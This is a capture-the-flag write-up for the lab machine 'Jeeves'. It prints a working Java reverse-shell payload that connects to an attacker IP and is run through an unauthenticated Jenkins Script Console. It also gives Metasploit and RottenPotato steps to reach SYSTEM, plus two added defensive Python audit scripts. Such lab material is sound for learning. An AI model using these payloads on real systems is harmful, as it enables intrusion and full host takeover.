Introduction
Jeeves is a machine rated easy. It is compromised through the unauthenticated Jenkins dashboard: a Java reverse shell is run from Jeeves' Script Console (where Groovy scripts can be run for troubleshooting) and the connection comes back to my netcat listener.
Once the reverse connection is established, I moved to the user's desktop to get the user flag.
Checking the user's privileges, there is a SeImpersonatePrivilege, which is the condition needed to run rottenpotato and elevate to "NT Authority\System".
Next is privilege escalation with rottenpotato. rottenpotato works with incognito, which is easily loaded if the shell is a meterpreter; the video on how to do the rottenpotato attack can be found here.
After the root flag is obtained, the last step is to exit meterpreter and clean up from another connection by deleting the uploaded rottenpotato; to delete it, the process has to be killed forcefully with taskkill /PID <pid of rottenpotato>.
nmap
nmap -A -p- -oN jeeves -vvv 10.10.10.63
Increasing send delay for 10.10.10.63 from 0 to 5 due to 61 out of 202 dropped probes since last increase.
Nmap scan report for 10.10.10.63
Host is up, received syn-ack (0.17s latency).
Scanned at 2020-05-02 21:58:07 +08 for 595s
Not shown: 65531 filtered ports
Reason: 65531 no-responses
PORT      STATE SERVICE      REASON  VERSION
80/tcp    open  http         syn-ack Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
445/tcp   open  microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         syn-ack Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 5h03m13s, deviation: 0s, median: 5h03m13s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 55172/tcp): CLEAN (Timeout)
|   Check 2 (port 48223/tcp): CLEAN (Timeout)
|   Check 3 (port 55682/udp): CLEAN (Timeout)
|   Check 4 (port 48293/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-05-02T19:10:36
|_  start_date: 2020-05-02T18:53:29

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 2 22:08:02 2020 -- 1 IP address (1 host up) scanned in 595.85 seconds
Directory enumeration with gobuster on port 50000
gobuster dir -u http://10.10.10.63:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -o web_enum
The result is /askjeeves (Status: 302)
Browsing to http://10.10.10.63:50000/askjeeves shows the Jenkins dashboard.
Clicking on “Manage Jenkins” I found “Script Console”.
Reverse shell connection
I borrowed the Java reverse shell from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#java and changed the port and IP address.
String host="10.10.14.25";
int port=1337;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
  while(pi.available()>0)so.write(pi.read());
  while(pe.available()>0)so.write(pe.read());
  while(si.available()>0)po.write(si.read());
  so.flush();po.flush();
  Thread.sleep(50);
  try{p.exitValue();break;}catch(Exception e){}
};
p.destroy();s.close();
Before running the script in Jeeves' Script Console, I set up a listener with nc -lvnp 1337.
Get the user flag
User’s privilege
The user has SeImpersonatePrivilege, which can be exploited by rottenpotato.exe.
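An added example, not from the writeup: parsing whoami /priv output and flagging the impersonation privileges that a service or application account should not hold unless it actually needs them. The listing is a constructed sample.

```python
"""Flag token privileges that allow a process to take on another account's
identity, from the text of `whoami /priv` (constructed sample below)."""
import re

# Privileges that, once held, let a process obtain and use another account's token.
IMPERSONATION_PRIVILEGES = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
}

# Constructed sample in the layout whoami /priv prints.
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_privileges(text):
    """Return {privilege_name: state} for every privilege row in the output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def impersonation_risk(text):
    """Held impersonation privileges, regardless of state: a privilege shown as
    Disabled is still in the token and can be re-enabled by the process itself,
    so presence, not the State column, is what an audit should key on."""
    return sorted(p for p in parse_privileges(text) if p in IMPERSONATION_PRIVILEGES)
```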
Get meterpreter connection
I would need incognito to execute rottenpotato in the background; the easiest way is to load incognito from meterpreter.
To get a meterpreter I would be using exploit/multi/script/web_delivery to deliver the stager over to Jeeves.
I used these settings for my exploit. Target 2 specifies PowerShell; the default payload is a Python script, so after setting target 2 I have to change the payload to payload/windows/meterpreter/reverse_tcp, which is compatible with PowerShell.
The Jeeves machine runs Windows 10 Pro 64-bit, but I could not get the x64 reverse TCP payload delivered; the good old payload/windows/meterpreter/reverse_tcp was delivered.
I will copy and paste the PowerShell payload into the nc session.
Privilege escalation
I have already downloaded rottenpotato; I upload it to Jeeves and load incognito. Both load incognito and use incognito work.
By calling help, these are the incognito commands:
The current user has no tokens to impersonate, but after rottenpotato is executed the "NT Authority\System" token will be available for impersonation.
The available options for execute are as follows:
execute -Hc -f /users/kohsuke/downloads/rottenpotato.exe, which executes rottenpotato in the background and creates a channel for interacting with incognito.
Running list_tokens -u, I now have a token available to impersonate.
Run the incognito command impersonate_token "NT AUTHORITY\SYSTEM".
There is a small twist: hm.txt does not directly reveal the root flag.
I create a shell from meterpreter and run dir /R, which reveals whether any files have an alternate data stream.
Read the alternate stream content with more < hm.txt:root.txt.
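An added example (not the writeup's own code) for the triage side of that step: parsing dir /R output for alternate data streams, with the benign Zone.Identifier stream that browsers attach to downloads separated from anything else. The listing is a constructed sample in the layout dir /R prints.

```python
"""Triage `dir /R` output for files carrying alternate data streams (ADS)."""
import re

# Constructed sample: stream rows follow their file row, carrying only a size
# and the file:stream:$DATA name, with no date or time columns.
SAMPLE_DIR_R = """ Volume in drive C has no label.
 Volume Serial Number is 1234-ABCD

 Directory of C:\\Users\\Administrator\\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM               797 desktop.ini
11/03/2017  11:03 PM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
05/01/2020  09:12 PM            10,240 tool.exe
                                    26 tool.exe:Zone.Identifier:$DATA
               3 File(s)         11,073 bytes
               2 Dir(s)  12,345,678,901 bytes free
"""

# Streams that Windows and browsers create routinely (Mark of the Web).
BENIGN_STREAMS = {"Zone.Identifier"}

# Leading whitespace, a size with thousands separators, then file:stream:$DATA.
STREAM_LINE = re.compile(r"^\s+([\d,]+)\s+(.+?):([^:]+):\$DATA\s*$")


def find_alternate_streams(listing):
    """Return [(file_name, stream_name, size_bytes)] for every non-default stream."""
    found = []
    for line in listing.splitlines():
        m = STREAM_LINE.match(line)
        if m:
            size = int(m.group(1).replace(",", ""))
            found.append((m.group(2), m.group(3), size))
    return found


def suspicious_streams(listing):
    """Same as find_alternate_streams, minus streams on the benign allow-list."""
    return [(f, s, n) for f, s, n in find_alternate_streams(listing)
            if s not in BENIGN_STREAMS]
```

A text file whose stream is nearly the size of the file itself, as with hm.txt here, is exactly the kind of row this should bring to the top of a review.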
Clean up
When I used tasklist /svc, rottenpotato was not displayed, which is intended due to the execute -H option.